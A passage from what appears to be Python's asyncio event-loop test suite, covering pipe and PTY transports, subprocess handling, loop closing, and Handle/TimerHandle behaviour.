['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
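# A cancelled sock_recv() future must wake up run_forever() promptly
# (well under 0.1 s).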
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
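# Count how many times _run_once() runs while sleeping for progressively
# smaller timeouts; a timeout-rounding bug would make the loop spin far
# more often than expected.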
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of calls is 12, but on some platforms the selector
# may sleep a little bit less than the timeout, depending on the
# resolution of the clock used by the kernel. Tolerate a few extra
# calls on these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
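# Mixin with subprocess_exec()/subprocess_shell() tests, combined with the
# event loop mixins in the concrete test classes below.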
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
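# Concrete per-platform test classes: select and proactor loops on Windows,
# otherwise one class per available selector.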
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
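# Tests for asyncio.Handle: callback storage, cancellation, repr in normal
# and debug mode, and source tracebacks.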
class HandleTests(test_utils.TestCase):
def setUp(self):
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_handle_from_handle(self):
def callback(*args):
return args
h1 = asyncio.Handle(callback, (), loop=self.loop)
self.assertRaises(
AssertionError, asyncio.Handle, h1, (), self.loop)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
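# Tests for asyncio.TimerHandle: hashing, cancellation, repr and ordering
# comparisons.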
class TimerTests(unittest.TestCase):
def setUp(self):
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
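# AbstractEventLoop is a pure interface: every method must raise
# NotImplementedError.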
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
